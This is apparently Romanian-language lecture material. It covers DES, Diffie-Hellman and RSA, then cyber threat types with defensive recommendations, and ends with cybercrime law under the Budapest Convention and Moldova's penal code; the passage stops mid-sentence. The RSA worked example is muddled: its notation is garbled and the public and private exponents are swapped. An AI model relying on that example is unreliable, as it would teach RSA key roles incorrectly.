– Cu autosincronizare
caracterul criptat Ci+1 depinde de Ci
Tipuri de algoritmi de criptare
• Algoritmi Asimetrici
– RSA
• Algoritmi Simetrici
– AES(Advance Encryption Standart)
– DES(Data Encriptyon Standart)
– 3DES
– Blowfish
– IDEA
– RC2, RC4, RC5
Algoritmi Simetrici
Sistemele criptografice simetrice folosesc aceeasi cheie K, atit la
criptarea, cît si la decriptarea mesajelor. Cheia este secreta si este
folosita in comun de catre emițător, cel care criptează mesajul M,
si de catre receptor
DES(Data Encryption Standard)
• Propus iniţial de cunoscutul gigant IBM sub
forma sistemului Lucifer, DES a rezistat
evaluării făcute de-a lungul a aproape două
decenii nu numai de „spărgătorii de cifruri" de la
NSA-National Security Agency din SUA ci şi de
nenumăraţi matematicieni de la marile
universităti din lume.
• DES a fost adoptat ca standard federal în 1977
şi a fost folosit intens datorită performanţelor de
viteză atinse la cifrare.
Algoritmul DES
Sistemul DES cripteaza un bloc de text clar de 64 biti intr-un text
criptat tot de 64 biti, utilizand o cheie de 56 biti. Algoritmul cuprinde
3 etape:

1. Fie α textul clar initial, de 64 biti. Lui i se aplica o permutare IP


initiala fixata, obtinandu-se α0 = IP (α) = L0R0. L0 este format din
primii 32 biti ai lui α0, iar R0 – din ultimii 32 biti.

2. Se efectueaza 16 iteratii (tururi) ale unei functii care se va


preciza. La fiecare tur se calculeaza Li, Ri (1 ≤ i ≤ 16) dupa regula
Li = Ri−1, Ri = Li−1 f (Ri−1, Ki), unde este sau - exclusiv (XOR) a
doua secvente binare. f este o functie care se va preciza, iar K1, K2,
. . . , K16 sunt secvente de 48 biti calculati din cheia K. Se spune ca
K1, K2, . . . , K16 sunt obtinuti prin diversificarea cheii (key shedule).

3. Blocului R16L16 i se aplica inversa permutarii initiale pentru a


obtine textul criptat β = IP−1(R16L16).
Permutarea initiala IP
Permutarea invers˘a IP−1
Algoritmul DES. Functia Feistel
Functia de criptare f (A, J ) are ca argumente doua
secvente binare: una de 32 biti, iar a doua de 48 biti.
Rezultatul este o secventa de 32 biti. Etapele de calcul
ale functiei sunt:

1. Argumentul A este extins la 48 biti folosind o functie


de expansiune E. E(A) cuprinde bitii lui A asezati intr-o
anumita ordine, unii biti fiind scrisi de doua ori.

2. Se calculeaza B = E(A) J ; rezultatul se


descompune in 8 subsecvente de cate 6 biti fiecare:
B = B1B2B3B4B5B6B7B8
Algoritmul DES
• Functia de expansiune E este definita de
tabloul:
Algoritmul DES
3. Se folosesc 8 S − cutii S1, S2, . . . , S8, fiecare din ele
fiind un tablou de dimensiuni 4 × 16 cu elemente numere
intregi din intervalul [0, 15].
Pentru o secventa Bj =b1b2b3b4b5b6 se calculeaza un sir
de 4 biti Sj(Bj) astfel: bitii b1b6 dau reprezentarea binara
a indicelui unei linii r (0 ≤ r ≤ 3) din Sj; ceilalti biti b2b3b4b5
dau reprezentarea binara a indicelui unei coloane c (0 ≤
c ≤ 15) din tablou.
Atunci Cj = Sj(Bj) =[Sj(r, c)]2(1 ≤ j ≤ 8). ([x]2 este
reprezentarea in baza 2 a numarului intreg x).

4. Secventa C = C1C2C3C4C5C6C7C8 – de lungime 32 –


se rearanjeaza folosind o permutare fixata P . Rezultatul
final este f (A, J) = P (C ).
Cele opt cutii S (S -boxes)
Permutarea fixata P
Algoritmul DES.
Diversificarea cheii K
1. Din cheie se elimina bitii de paritate (bitii
de pe pozitiile 8, 16, 24, . . . , 64 sunt biti
de paritate, aranjati in asa fel incat fiecare
octet sa contina un numar impar de 1).
Asupra celorlalti se aplica o permutare
PC1, obtinandu-se PC1(K) = C0D0,(C0 sunt
primii 28 biti din secventa, iar D0 – ceilalti
28 biti).
Permutarea PC1
Algoritmul DES
Diversificarea cheii K
2. Pentru i = 1, 2, . . . , 16 se calculeaza
Ci = LSi(Ci−1), Di = LSi(Di−1) si Ki =
PC2(CiDi).
LSi este o rotatie circulara la stanga cu
una sau doua pozitii, in functie de valoarea
lui i: o pozitie daca i = 1, 2, 9, 16, altfel
rotirea este de doua pozitii.
Permutarea PC2
DES
DES operează în următoarele moduri:
• Criptarea prin blocuri înlănţuite (CBC)
• Criptarea – carte electronică de coduri
(ECB)
• Criptarea cu feedback la ieşire (OFB)
Criptarea prin blocuri înlănţuite
(CBC - Cipher-block chaining )
Criptarea prin blocuri înlănţuite
(CBC - Cipher-block chaining )
Criptarea – carte electronică de
coduri (ECB - Electronic codebook )

Mesajul este împărţit în blocuri şi fiecare bloc e criptat separat


Criptarea – carte electronică de
coduri (ECB - Electronic codebook )
Criptarea cu feedback la ieşire
(OFB - Output feedback )
Criptează vectorul de iniţializare şi e folsit pentru criptarea
următorului bloc
Criptarea cu feedback la ieşire
(OFB - Output feedback )
Algoritmul DES
A fost spart in 1998 cu “Deep Crack.”

2000 - NIST confirma noul “AES - Advanced Encryption


Standard”, blocuri de 128-biti si chei de 128, 192 si 256-
biti – 5 finalisti:

– MARS (IBM - USA)


– RC6 (RSA Labs - USA)
– Rijndael (Daemen and Rijmen - Belgium)
– SERPENT (Anderson, Biham, and Knudsen -UK, Israel,
Norway)
– TWOFISH (Schneier, Kelsey, et al. - USA)
Algoritmi asimetrici
Criptografia asimetrică este un tip de criptografie în care
utilizatorul are o pereche de chei, una publică şi una privată.
Folosind cheia publică se poate cripta un mesaj care nu va
putea fi decriptat decât cu cheia pereche, cea privată.
Matematic, cele două chei sunt legate, însă cheia privată nu
poate fi obținută din cheia publică.

Cele două mari ramuri ale criptografiei asimetrice sunt:


•Criptarea cu cheie publică – un mesaj criptat cu o cheie
publică nu poate fi decodificat decat folosind cheia privată
corespunzătoare. Metoda este folosită pentru a asigura
confidenţialitatea.
•Semnături digitale – un mesaj semnat cu cheia privata a
emiţătorului poate fi verificat de oricine are acces la această
cheie, astfel asigurandu-se autenticitatea mesajului.
Algoritmi asimetrici
Schimbul de chei Diffie-Hellman
• În 1976 doi specialişti de la Standford University au
propus o metodă de comunicare între două părţi prin
mesaje secrete fără să fie nevoie de o terţă parte, de un
schimb offline sau de transmiterea vreunei valori secrete
între ele.
• Metoda se bazează pe conceptul perechii de chei
publică-privată. Protocolul începe cu fiecare parte care
generează independent cîte o cheie privată. La pasul
următor, fiecare calculează o cheie publică, aceasta fiind
o funcţie matematică a cheilor private respective.
Urmează schimbul de chei publice. În final, fiecare
calculează o funcţie a propriei chei private şi a cheii
publice a celeilalte persoane. Ambii vor obţine aceeaşi
valoare şi o vor folosi ca pe cheie a mesajului.
Schimbul de chei Diffie-Hellman
• Alice şi Bob stabilesc cheia mesajului secret:
• Alice generează o cheie secretă xa
• Bob generează o cheie secretă xb
• Alice calculează o cheie publică ya=gxa mod p, p
număr prim, g<p
• Bob calculează o cheie publică yb=gxb mod p
• Ei vor schimba valorile publice ale acestora
• KAlice= ybxa mod p=gxa*xb mod p
• KBob= yaxb mod p=gxa*xb mod p
Exemplu Diffie-Hellman
• Fie p=7, g=3
• Cheia secretă a lui Alice xa=1,
• Cheia secretă a lui Bob xb=2
• Cheia publică a lui Alice ya=gxa mod p=31 mod
7=3
• Cheia publică a lui Bob yb=gxb mod p=32 mod
7=2
• Alice calculează K=ybxa mod p=21 mod 7=2
• Bob calculează K=yaxb mod p=32 mod 7=2
RSA
• Algoritmul a fost dezvoltat în 1977 şi publicat în
1978 de Ron Rivest, Adi Shamir şi Leonard
Adleman la MIT şi îşi trage numele de la
iniţialele numelor celor trei autori

• Puterea sa criptografică se bazează pe


dificultatea problemei factorizării numerelor
întregi, problemă la care se reduce criptanaliza
RSA şi pentru care toţi algoritmii de rezolvare
cunoscuţi au complexitate exponenţială
RSA. Generarea cheilor
RSA. Criptarea şi Decriptarea
Exemplu RSA
• Fie Bob a ales numerele prime secrete pb=5 şi qb=3
• Se calculează Nb=pb*qb=5*3=15
• Se alege exponentul secret eb=29
• Se calculează db=db*eb=1 mod (pb-1)(qb-1)
• Se va obţine db*29=1 mod (4*2), db=5
• Perechea de chei este (KBs15,29) şi (KBp15, 5)
• Dacă Alice transmite cheia K=2 către Bob, o va cripta cu
cheia publică a lui Bob:
C=Kdb mod Nb=25 mod 15=32 mod 15= 2
• Cînd Bob obţine cheia criptată K, o va decripta cu cheia
lui secretă:
K=Ceb mod Nb=229 mod 15=2
Protocoale de securitate care
folosesc RSA:
• IPSEC/IKE - IP data security
• TLS/SSL - transport data security (web)
• PGP - email security
• SSH - terminal connection security
• SILC - conferencing service security
Forme de manifestare a pericolelor în spațiul cibernetic. Infracțiuni informatice

1. Clasificarea amenințărilor

Ameninţările la adresa securității se realizează prin exploatarea vulnerabilităților.


Vulnerabilitatea este o slăbiciune a unui activ sau a unui grup de active, care pot fi exploatate de către unul sau mai
multe ameninţări.
Managementul vulnerabilităţii este o funcţie de bază pentru securitatea ITC.
Managmentul vulnerabilităţii este o practică ciclică de identificare, clasificare, remediere şi atenuare a
vulnerabilităţilor.
Vulnerabilitatile din retea reprezinta AUR pentru hackeri/crackeri: ofera posibilitatea accesării resurselor aflate în
rețea și pot da acces la informații confidențiale, la date personale, pot încălca drepturile de autor sau chiar bloca
activitatea.
Sursa vulnerabilităților:
- configurarea neadecvată a sistemelor și echipamentelor;
- defecte software (bug-uri), erori de programare, software malițios;
- mod de organizare: utilizarea tehnologiilor învechite și neactualizate;
- mecanisme nesigure de control al accesului;
- instruire insuficientă a utilizatorilor și apariția greșelilor accidentale;
- amplasarea neprotejată a clădirilor, camerelor, server-elor, mediilor de comunicații.
Soluții de management al vulnerabilității sunt scanerele de rețea, web application scanning, vulnerability
management, exploit kit-urile ale vendorilor de securitate:Qualys, McAfee, Saint, Acunetix etc.

Ameninţările la adresa integrităţii, cofidențialității şi disponibilității sistemelor și serviciilor electronice și de comunicații


se pot exercita prin mai mulţi vectori. Cei mai frecvenţi, sunt:
- utilizatorii răutăcioşi sau răuvoitori;
- anumite persoane din interiorul organizaţiei (insideri), care au acces la date şi procedeile utilizate în sistemul de
securitate al organizaţiei respective;
- persoane din afara organizaţiei (autsideri )dar care au acces la anumite informaţii extrem de sensibile pentru
securitatea organizaţiei;
- programele malitioase, spionii;
- organizaţiile criminale şi teroriste;
- cataclismele naturale.

O altă clasificare, presupune:


1) Amenințări de natură umană
- acțiuni deliberate
acces neautorizat la date și sistem
interceptare/modificare trafic
denial of service
cod/program malițios
furt sau distrugere de date sau echipamente
inginerie socială (social engineering)
- accidente – erori de operare
2) De natură tehnică
- întrerupere alimentare cu energie
- defectare echipamente
3) De mediu
- dezastre naturale
- condiții exterioare (contaminare, interferență electromagnetică)

Metoda STRIDE elaborată de Microsoft, este un acronim ce vine de la șase categorii de amenințări:
- Spoofing (falsificarea identității): reprezintă pretinderea de a fi altcineva prin obținerea accesului ilegal asupra
datelor;
- Tampering (fraudarea datelor): reprezintă procesul de modificare a datelor precum modificarea datelor dintr-o
bază de date sau alterarea datelor aflate în tranzit;
- Repudiation (repudierea): repudierea este asociată cu utilizatorii care neagă efectuarea unei acțiuni fără ca
celelalte părți să poate demonstra inversul; de exemplu, un utilizator a efectuat o operație ilegală într-un sistem care nu
are un mecanism de urmărire a acțiunilor efectuate;

1
- Information disclosure (dezvăluirea informației): implică expunerea informațiilor sensibile individualilor care nu
ar trebui să aibă acces la informațiile respective; de exemplu, abilitatea unui utilizator de a citi un fișier la care nu au
acces;
- Denial of service (întreruperea serviciilor): reprezintă un atac care previne accesul legitim la resurse; de exemplu,
făcînd un serviciu web temporar indisponibil;
- Elevation of privilege (ridicarea nivelului de privilegii): reprezintă un atac în care un utilizator obține acces privilegiat
și prin urmare are privilegii suficiente pentru a compromite sau a distruge întregul sistem; ridicarea nivelului de privilegii
include situațiile în care un utilizator a trecut de toate mecanismele de securitate a sistemului, devenind parte de încredere a
sistemului.

Ținta amenițărilor:
- Sistemele informatice și procesele care le execută – instrucțiunile programelor și datele care sunt prelucrate de aceste
programe;
- Datele – reprezentarea de fapte, concepte sau instrucțiuni, într-o modalitate potrivită pentru comunicare,
interpretare sau procesare: dstele curente din memorie, fișiere stocate sau informații transmise prin mediul de
comunicații;
- Sistemul de calcul - dispozitivele fizice care constau din una sau mai multe componente asociate, incluzând unități de
procesare, de memorie și periferice, controlate de programele stocate intern;
- Componenta (fizică sau logică) sistemului de calcul sau a rețelei de comunicații;
- Conturi de utilizator sau administrator – domeniul de acces al utilizatorului (în sistem sau rețea), care este
controlat conform unor înregistrări ce conțin numele contului, parola și drepturile de acces la cont;
- Rețelele de comunicații și Internetul – grupul interconectat de echipamente de rețea sau rețele interconectate.

2. Tipuri de amenițări

Acces neautorizat la date și sistem (Acces ilegal)


Pentru obţinerea accesului, făptuitorul va încerca o gamă variată de procedee tehnice, cum ar fi atacul: prin parolă;
de acces liber; care exploatează slăbiciunile tehnologice; care exploatează bibliotecile partajate; IP; prin deturnarea TCP
etc.
Spargerea parolelor. Procesul de ghicire a parolelor poate fi automatizat prin utilizarea unui program care ghiceşte
parolele în permanenţă, cunoscut sub numele de tehnică de spargere a parolelor prin forţă brută (brute force password-
cracking technique). Un program care execută asemenea atacuri este disponibil pe scară largă în Internet. Programul de
atac prin forţă brută va încerca parole gen aa, ab, ac etc., până când a încercat fiecare combinaţie posibilă de caractere.
În final, hackerul va obţine parola.
Atacul parolelor prin dicţionar. În general, aceste programe simple rulează pe rând fiecare cuvânt din dicţionar, în
încercarea de a găsi o parolă. Astfel, atacurile prin parole automate au devenit rapid cunoscute sub denumirea de atacuri
cu dicţionarul (dictionary-based attacks).

RISCURI ȘI RECOMANDĂRI
Cele mai bune soluţii împotriva atacurilor prin dicţionar sunt: modificarea sistematică a parolelor, rularea periodică a unui
program de analiză a sistemului pentru verificarea parolelor.

Un tip interesant de acces ilegal, din ce în ce mai utilizat astăzi, îl reprezintă atacurile prin inginerie socială. Acestea
au devenit mai frecvente şi mai periculoase. Un exemplu frecvent de inginerie socială este ca un hacker să trimită mesaje
email către utilizatori (sau pur şi simplu să folosească telefonul) pentru a-i anunţa pe aceştia că el este administratorul
sistemului. Deseori, mesajele solicită utilizatorilor să-şi trimită parola prin email către administrator, fiindcă sistemul
este într-o pană sau va fi dezafectat temporar.
Un atac prin inginerie socială se bazează cel mai mult pe ignoranţa utilizatorilor în materie de calculatoare şi reţele.

RISCURI ȘI RECOMANDĂRI
Cea mai bună reţetă împotriva ingineriei sociale o reprezintă educaţia utilizatorilor.

Interceptarea ilegală a unei transmisii de date informatice


Interceptarea pachetelor - spionaj în reţea (network snooping) sau supraveghere ascunsă (promiscous monitoring),
reprezintă una dintre infracţiunile cele mai dificil de realizat, şi este, de asemenea, o ameninţare serioasă la adresa
comunicaţiilor prin Internet.

2
Fiecare pachet trimis prin Internet poate tranzita un număr mare de calculatoare şi reţele înainte de a ajunge la
destinaţie. Prin intermediul unui interceptor de pachete (sniffere), hackerii pot intercepta pachetele de date (inclusiv
cele cu mesaje de login, transmisii ale identificatorilor numerici ai cărţilor de credit, pachete email etc.) care călătoresc
între diferite locaţii din Internet. După ce interceptează un pachet, hackerul îl poate deschide şi poate fura numele
hostului, al utilizatorului, precum şi parola asociată pachetului.

RISCURI ȘI RECOMANDĂRI
Pentru a preveni atacurile de interceptare ilegală asupra reţelelor se recomandă să fie folosite schemele de
identificare, cum ar fi un sistem cu parolă unică (OTM) sau un sistem de autentificare prin tichete (Kerberos). Criptarea
datelor transmise la fel prezintă o soluție eficientă de protecție.

În general, sniffer-ele sunt utilizate de administratorii de reţea sau de Internet Service Provideri (ISP) pentru
realizarea analizei de trafic în cadrul unei reţele în scop tehnic, de mentenanţă. Totodată, acestea sunt folosite de către
administratorii reţelelor unor instituţii pentru monitorizarea comunicaţiilor (interne sau externe) ale angajaţilor.
De exemplu, sistemul Carnivore dezvoltat de către Biroul Federal de Investigaţii al SUA (FBI), menit să faciliteze
agenţiei accesul la activităţile informatice desfăşurate de potenţialii infractori. Un alt sistem creat, la fel, de FBI a fost
Omnivore, utilizat, în special, pentru supravegherea traficului de mesaje de poştă electronică. Alt sistem, mult mai
complex, poate fi menționat DragonWare Suite.
O altă metodă de interceptare indirectă sau de la distanţă o constituie folosirea programelor tip keylogger, adware,
spyware.
Programele de tip Adware şi Spyware se încarcă automat în PC-ul personal în momentul vizitării unei anumite
pagini Web. Scopul lor este de a înregistra “traseul online” şi a transmite înapoi celor care le-au trimis (de obicei este
vorba despre companii care fac comerţ prin Internet, firme de marketing şi publicitate) date şi informaţii despre
preferinţele utilizatorului în materie de pagini Web, conţinut, tematică etc.
Un program Keylogger este o aplicaţie specializată care înregistrează fiecare tastă pe care o apasă un utilizator şi
trimite informaţiile către persoana care a instalat programul. Acest software poate extrage informaţii extrem de
folositoare, cum ar fi numărul cărţii de credit, rapoarte ale companiei, informaţii secrete dintr-o instituţie sau date cu
caracter financiar. Tot în aceeaşi gamă există şi programele de monitorizare a emailurilor: Websense, MIMEsweeper,
FastTrack etc.

RISCURI ȘI RECOMANDĂRI
Pentru a ajuta la protejarea computerului de programe spion, utilizați un program antispyware, (de exemplu,
WindowsDefender).

Banala tastatură. În esenţă, se pot decoda sunetele produse de butoanele tastaturii. Cercetătorii de la Berkley,
Universitatea California, au descoperit că o simplă înregistrare a sunetelor produse de tastatură poate fi folosită pentru
descifrarea textului scris de utilizator, indiferent dacă este o parolă, o scrisoare de dragoste sau un secret de stat. Experţii în
computere ai renumitei instituţii academice au înregistrat timp de 10 minute sunetele produse de o tastatură. Fişierul audio
rezultat a fost introdus într-un computer şi "decriptat" cu ajutorul unui software special. Au fost recuperate cu exactitate 96%
din caracterele scrise de utilizator. Asta înseamnă că textul a putut fi dedus fără nici o problemă, chiar dacă mai lipsea câte o
literă la câteva cuvinte.
Astăzi persoane interesate captează, cu ajutorul unor dispozitive speciale, radiaţiile electromagnetice existente în
imediata vecinătate a monitorului computerului ţintă, pe care le „traduc” transformându-le în impulsuri electrice şi, mai
apoi, în caractere alfanumerice.

RISCURI ȘI RECOMANDĂRI
Tehnologia de protecţie a sistemelor de calcul împotriva captării emisiilor se numeşte TEMPEST – Transient
ElectroMagnetic Pulse Emanation STandardizing.

Alterarea integrităţii datelor informatice


Cele mai periculoase instrumente care alterează datele informatice sunt însă programele tip Virus, Vierme sau Cal
Troian, care se reproduc şi se pun în lucru în alte programe ori fişiere de date ca programe de distrugere.
Virusul de calculatoare este unul dintre cele mai comune riscuri la adresa securităţii reţelelor. Ca şi un virus medical,
un virus de calculator se extinde prin ataşarea la programe sănătoase (echivalentul celulelor sănătoase). După infectarea
unui sistem, virusul de calculator se ataşează de fiecare fişier executabil, fişier obiect sau ambele, situate în sistemul
unde se află virusul. Mai mult, unii viruşi infectează sectorul de boot al unităţilor de disc.

3
Există mai multe clase de viruşi. Fiecare clasă foloseşte o metodă diferită pentru a se reproduce. Printre cele mai
frecvente şi interesante tipuri de viruşi amintim: viruşii de criptare polimorfici şi nonpolimorfici, viruşii invizibili, viruşii
lenţi, viruşii retro, viruşii multipartiţi, viruşii protejaţi şi viruşii fagi, viruşii macro etc.
Virusul Cal Troian se ascunde în codul unui fişier non-executabil (de exemplu, fişiere comprimate sau fişiere
document) sau, în unele cazuri, chiar într-un fişier executabil pentru a nu fi detectat de majoritatea programelor antivirus.
Un Cal Troian va intra în execuţie după ce a trecut cu bine de programul de detecţie antivirus. Deseori, viruşii Cal Troian
apar sub masca unor programe utile sau ca fişiere bibliotecă în cadrul unui fişier arhivă comprimat.
Viermele Internet produce căderea unui sistem prin crearea unui număr extrem de mare de copii ale acestuia în
memoria calculatorului, eliminând toate programele din memorie. Deoarece un virus-vierme are tendinţa să dezactiveze
calculatorul infectat, hackerii construiesc în general viruşi-vierme care trec de la calculatorul infectat la un altul, aflat în
conexiune cu primul. Viruşii-vierme se copiază pe alte calculatoare folosind protocoale obişnuite.

RISCURI ȘI RECOMANDĂRI
O soluţie este de a memora informaţia şi programele de securitate pe medii izolate, nemodificabile, cum ar fi o
unitate WORM – unitate de stocare pe suport optic.

Perturbarea funcţionării sistemelor informatice


Un astfel de exemplu este Denial of Service - DOS (refuzarea serviciului) în care o resursă de pe Internet, cum ar fi
un server sau un site Web nu mai funcţionează corespunzător deoarece atacatorii lansează un atac coordonat care
supraîncarcă ţinta cu atât de multe solicitări false, încât sistemul nu mai poate să le administreze şi este copleşit.
Cel mai comun tip de atac DoS are ca efect împiedicarea accesului utilizatorilor de Internet la un anumit site Web,
ceea ce poate avea ca rezultat pierderi financiare imense în contextul unei organizaţii ale cărei afaceri depind de Internet.
O altă modalitate prin care un atacator poate să preia controlul asupra unui sistem informatic sau să introducă
aplicaţii maliţioase este prin intermediul Codului Mobil. Acesta este o categorie de cod scris (in limbajele Java,
JavaScript şi ActiveX) şi încadrat într-un document tip HTML. Când browser-ul utilizatorului încarcă pagina de Web,
codul mobil ascuns este descărcat şi executat de către browser.
Operaţiuni ilegale cu dispozitive sau programe informatice
Un exemplu în acest sens poate fi conceperea, cu ajutorul limbajului de programare de nivel înalt C++, a unui
program care, pus în execuţie pe un computer, permite accesul unei persoane neautorizate la resursele sale ori la întregul
sistem informatic la care este conectat, prin efectuarea unei operaţiuni de „identificare” a parolei ori codului de acces.
Cele mai periculoase programe informatice sunt Backdoors, RootKit.
Backdoors (ușile din spate) permit ca un dipozitiv al unei rețele să fie controlat de alt dspozitiv de la distanță, printr-un utilitar
de administrare a retelelor.
Rootkit-ul face referire la acel cod software utilizat pentru modificarea sau simularea funcţiilor de bază ale unui
sistem de operare, dând posibilitatea unui atacator să acceseze un sistem informatic de la distanţă. Un rootkit poate, de
exemplu, să fie disimulat în comanda dir (windows) sau ls (unix), astfel încât pe lângă funcţia de bază a acelei comenzi
să realizeze şi alte acţiuni despre care utilizatorul nu este conştient .
Rootkit sunt împărţite în două categorii:
- user – mode: modifică cod software din sistemul de operare folosit la nivel utilizator (dir, ch, ls);
- kernel – mode: modifică cod software din sistemul de operare utilizat la nivel nucleu (kernel) - servicii, daemons,
procese şi fire de execuţie, management întreruperi etc.
Falsul informatic
Poate lua una din următoarele forme:
- Simularea poştei electronice;
- Simularea hyperconexiunilor;
- Simularea Web-ului.
Frauda informatică
Frauda poate fi comisă cu ajutorul mai multor mijloace: poştă electronică, telefon, cablu, Internet etc. În mediul
informatic, frauda poate avea mai multe forme şi adesea se poate confunda cu înşelăciunea tradiţională, mijlocul de realizare
fiind computerul. Dat fiind mediul informatic în care acestea sunt iniţiate şi derulate:
- Bait and switch (momeşte şi schimbă);
- Scrisorile nigeriene;
- Prizonierul spaniol;
- Facturarea falsă;
- Înfiinţarea de firme „fantomă”.

4
Programele malițioase răspândite la moment sunt de tip Ransomware, ce împiedică accesul la fișiere, sau chiar la întregul sistem
informatic infectat, până la plata unei „recompense” (ransom). Este una dintre cele mai supărătoare forme de malware, întrucât
produce pagube financiare directe, iar de cele mai multe ori fișierele criptate de malware nu pot fi decriptate. Pentru a îngreuna
procesul de recuperare a fișierelor, ransomware-urile blochează accesul la fișiere (documente, fotografii, muzică, video etc.) prin
criptarea asimetrică a acestora. Cele mai recente versiuni sunt Wanna Cry, care a afectat companii și instituții din aproape 200 de
tări (mai 2017) și Petya/Petrwrap, care se răspândește doar în reteaua internă unde a avut loc infecția inițială a unei stații de
lucru, realizată prin intermediul unor documente atașate unor mesaje email de tip phishing, pe care utilizatorii sunt îndemnati să le
deschidă (iunie 2017).

RISCURI ȘI RECOMANDĂRI
1. Majoritatea atacurilor vizează exploatarea componentei umane (social engineering, phishing, spear phishing,
spam etc.). În consecință, nu accesați link-urile sau atașamentele conținute de mesajele email suspecte înainte de a
verifica, în prealabil, sursa/legitimitatea acestora.
2. O atenție sporită trebuie acordată site-urilor web pe care le accesați și surselor online pe care le utilizați
pentru descărcarea sau actualizarea aplicațiilor.
3. Cea mai eficientă metodă pentru combaterea amenințării ransomware este realizarea periodică de backup
(copii de rezervă) pentru datele stocate/procesate cu ajutorul sistemelor informatice. IMPORTANT! Pentru backup
utilizați un mediu de stocare extern care nu este conectat în permanență la sistem.
4. Activați opțiunile de tip System Restore în cazul sistemelor de operare Windows pentru toate partițiile de
stocare. Datele ar putea fi rapid restaurate prin aducerea sistemului la o stare anterioară. ATENȚIE! Nu vă bazați
exclusiv pe această facilitate deoarece unele versiuni recente de ransomware șterg datele din System Restore.

3. Infracțiuni informatice în reglementări internaționale

Convenţia Consiliului Europei asupra Criminalităţii Informatice, semnată la Budapesta la 23 noiembrie 2001,
încearcă în principal să armonizeze dispoziţiile de drept substanţial cu caracter penal în domeniul informatic, să
implementeze dispoziţii procedurale necesare pentru investigarea şi urmărirea unor asemenea infracţiuni şi să pună la
punct un sistem rapid şi eficient de cooperare internaţională.
Convenţia are, în consecinţă, patru capitole:
I – Înţelesul unor termeni şi expresii;
II – Măsuri necesare a fi luate la nivel naţional – Drept penal şi procedură penală;
III – Cooperarea internaţională;
IV – Dispoziţii finale.
Secţiunea I a cap. al II-lea (dispoziţii de drept penal) se referă atât la incriminarea unor fapte ca infracţiuni, cât şi la
alte aspecte de drept material, referitoare la răspunderea penală, participaţie şi sancţiuni.
Sunt definite aici nouă infracţiuni grupate în patru categorii diferite. Astfel, sunt considerate infracţiuni aducând
atingere confidenţialităţii, integrităţii şi disponibilităţii datelor şi sistemelor informatice:
- Accesarea ilegală (art.2);
- Interceptarea ilegală (art.3);
- Alterarea integrităţii datelor (art.4);
- Alterarea integrităţii sistemului (art.5)
- Abuzurile asupra dispozitivelor (art.6).
Sunt prevăzute ca infracţiuni în legătură cu mediul informatic:
- Falsificarea informatică (art.7);
- Frauda informatică (art.8).
O altă categorie de infracţiuni se referă la:
- Pornografia infantilă (art.9)
Ultima categorie face referire la:
- Infracţiuni care aduc atingere proprietăţii intelectuale şi drepturilor conexe (art.10).

Secţiunea a II-a a cap. al II-lea se referă la dispoziţii procedurale în materie penală, aplicabile în cazul săvârşirii
infracţiunilor prevăzute în secţiunea I, în cazul săvârşirii oricărei infracţiuni de drept comun prin intermediul sistemelor
informatice, ori în situaţiile în care dovada săvârşirii oricărei infracţiuni se regăseşte stocată într-un sistem informatic.
Totodată, se stabilesc condiţiile şi măsurile de protecţie aplicabile în cazurile mai sus menţionate. Astfel, se instituie
măsuri privind:
- conservarea rapidă a datelor informatice stocate (art.16);
- conservarea şi dezvăluirea parţială rapidă a datelor referitoare la trafic (art.17);
- ordinul de punere la dispoziţie a datelor (art.18);
- percheziţia şi sechestrarea datelor informatice stocate (art.19);

5
- colectarea în timp real a datelor referitoare la trafic (art.20);
- interceptarea datelor referitoare la conţinut (art.21).
De asemenea, sunt prevăzute dispoziţii referitoare la competenţă.
Capitolul al III-lea conţine dispoziţii privind asistenţa judiciară internaţională în materie penală în privinţa infracţiunilor
săvârşite prin mijloace informatice, incluzând şi dispoziţii referitoare la extrădare. Sunt prevăzute astfel două situaţii privind
asistenţa judiciară:
- când nu există nici o bază legală privind asistenţa judiciară între părţi, situaţie în care se aplică prevederile cap. al III-
lea;
- în situaţia în care această bază legală există, iar în acest caz dispoziţiile cap. al III-lea vin numai să completeze
dispoziţiile lacunare, dacă există.
Cooperarea judiciară se referă la dispoziţiile procedurale prevăzute în cap. al II-lea, secţiunea a II-a, dispoziţii enumerate
mai sus. În plus, sunt prevăzute în acest capitol dispoziţii privind accesul direct de la un sistem informatic aflat pe teritoriul
naţional la date stocate într-un sistem informatic aflat pe teritoriul unei alte ţări, în două situaţii, fără a fi nevoie de asistenţă
judiciară, respectiv atunci când se obţine consimţământul persoanei care are dreptul să dispună de aceste date, ori în situaţia în
care aceste date au fost puse anterior la dispoziţia publicului.
De asemenea se pun bazele unei reţele de cooperare care să funcţioneze non-stop între statele semnatare, pentru a
prelua şi rezolva cu promptitudine cererile de asistenţă judiciară.
Capitolul al IV-lea conţine clauzele finale, care cu câteva excepţii, repetă dispoziţiile standard din tratatele
Consiliului Europei. Republica Molodva a implementat în întregime dispoziţiile acesteia.

4. Infracțiuni informatice în reglementări naționale

Infracțiunile informatice se clasifică în:


- Infracțiuni săvârșite cu ajutorul sistemelor informatice, în care sistemele informatice constituie un instrument de facilitare
a comiterii unor infracțiuni. Este vorba de infracțiuni tradiționale, perfecționate prin utilizarea sistemelor informatice.
- Infracțiuni săvârșite prin intermediul sistemelor informatice, în care sistemele informatice, incluzând și datele
stocate în acestea, constituie ținta infracțiunii. Aceste infracțiuni pot fi săvârșite doar prin intermediul sistemelor
informatice.
Infracțiuni săvârșite cu ajutorul sistemelor informatice:
- Infracțiunea de reproducere, fără drept, a unei opere, reglementată de art.20, 23 din Legea privind dreptul de autor
și drepturilor conexe, nr.293-XIII din 23.11.1994.
- Infracțiunea de reproducere, fără drept, a programelor pentru computer, reglementată de art. 23 din Legea privind
dreptul de autor și drepturilor conexe, nr.293-XIII din 23.11.1994.
- Infracțiunea de spălare a banilor din Legea cu privire la prevenirea și combaterea spălării banilor și finanțării
terorismului, nr.633-XV din 15.11.2001.
- Infracțiunea de trădare prin transmitere de secrete, reglementată de art.337 din Codul penal.
- Infracțiunea de divulgare a secretului care periclitează siguranța statului, reglementată de art.344 din Codul penal.
- Infracțiunea de propagandă, reglementată de art.140 din Codul penal.
Infracțiuni săvârșite prin intermediul sistemelor informatice:
- Accesul ilegal la un sistem informatic. Infracțiunea de acces fără drept la un sistem informatic este prevăzută în
art.259 din Codul penal: Accesul ilegal la informația computerizată.
- Introducerea sau răspândirea programelor virusulente. Infracțiuni de cest gen sunt prevăzute în art.260 din Codul
penal: Producerea, importul, comercializarea sau punerea ilegală la dispoziţie a mijloacelor tehnice sau produselor
program (art. 2601 Înterceptarea ilegală a unei transmisii de date informatice; art. 2602 Alterarea integrităţii datelor
informatice ţinute într-un sistem informatic; art. 2603 Perturbarea funcţionării sistemului informatic; art. 2604
Producerea, importul, comercializarea sau punerea ilegală la dispoziţie a parolelor, codurilor de acces sau a datelor
